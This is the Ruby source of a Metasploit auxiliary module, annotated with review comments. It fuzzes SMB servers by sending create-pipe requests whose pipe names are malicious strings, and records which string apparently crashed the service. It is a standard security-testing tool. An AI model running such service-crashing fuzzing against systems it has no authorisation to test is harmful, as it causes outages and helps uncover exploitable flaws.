Path: blob/master/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'English'

# Auxiliary fuzzer that sends one SMB create request per fuzz string, using
# the string (prefixed with a backslash) as the pipe name.
#
# Every string gets its own connect / login / create / disconnect cycle. The
# run stops at the first iteration where connect or login no longer succeeds,
# and the report then names the string sent on the previous iteration.
#
# The module metadata declares 'Stability' => [CRASH_SERVICE_DOWN].
#
# NOTE(review): connect, smb_login, smb_create and disconnect are presumably
# supplied by Msf::Exploit::Remote::SMB::Client, and fuzz_strings /
# @last_fuzzer_input by Msf::Auxiliary::Fuzzer; neither mixin is defined in
# this file.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Fuzzer

  # Registers the module's name, description, author, license and notes.
  #
  # @param info [Hash] metadata merged with this module's values via update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'SMB Create Pipe Request Fuzzer',
      'Description' => %q{
        This module sends a series of SMB create pipe
        requests using malicious strings.
      },
      'Author' => ['hdm'],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    )

    super(module_info)
  end

  # Opens a fresh session and issues one create request for the given name.
  #
  # @connected is cleared first and only set once both connect and smb_login
  # have returned, so the caller can tell "never got a session" apart from
  # "the create request itself raised".
  #
  # @param pkt [String] fuzz string used as the pipe name
  # @param _opts [Object] accepted but never read
  def do_smb_create(pkt, _opts = {})
    @connected = false
    connect
    smb_login
    @connected = true

    pipe_name = '\\' + pkt
    smb_create(pipe_name)
  end

  # Feeds every fuzz string to do_smb_create and stops at the first
  # iteration that fails to establish a session.
  #
  # @return [void]
  def run
    iteration = 0
    prev_string = nil
    prev_input = nil
    latest_error = nil

    fuzz_strings do |str|
      iteration += 1

      # Progress line on every hundredth string.
      print_status("Fuzzing with iteration #{iteration} using #{@last_fuzzer_input}") if (iteration % 100).zero?

      begin
        # The second argument lands in do_smb_create's unused _opts parameter.
        do_smb_create(str, 0.25)
      rescue ::Interrupt
        # Interrupt is not a StandardError, so it needs its own clause; it is
        # announced and re-raised so the run actually stops.
        print_status("Exiting on interrupt: iteration #{iteration} using #{@last_fuzzer_input}")
        raise $ERROR_INFO
      rescue StandardError => e
        # Remembered for the failure report below. An error raised by
        # smb_create after a successful login is stored here too, but is only
        # ever printed if a later iteration fails to get a session.
        latest_error = e
      ensure
        disconnect
      end

      unless @connected
        # @connected stays false when connect OR smb_login raised, so this
        # branch also covers a failed login, not only an unreachable service.
        failure_report =
          if prev_string
            # The previous iteration's string is reported (hex-encoded, so
            # non-printable bytes survive): it was the last one delivered
            # before the session could no longer be established.
            "The service may have crashed: iteration:#{iteration - 1} method=#{prev_input} string=#{prev_string.unpack('H*').first} error=#{latest_error}"
          else
            # Nothing was sent yet: the very first attempt failed.
            "Could not connect to the service: #{latest_error}"
          end

        print_status(failure_report)
        return
      end

      prev_string = str
      prev_input = @last_fuzzer_input
    end
  end
end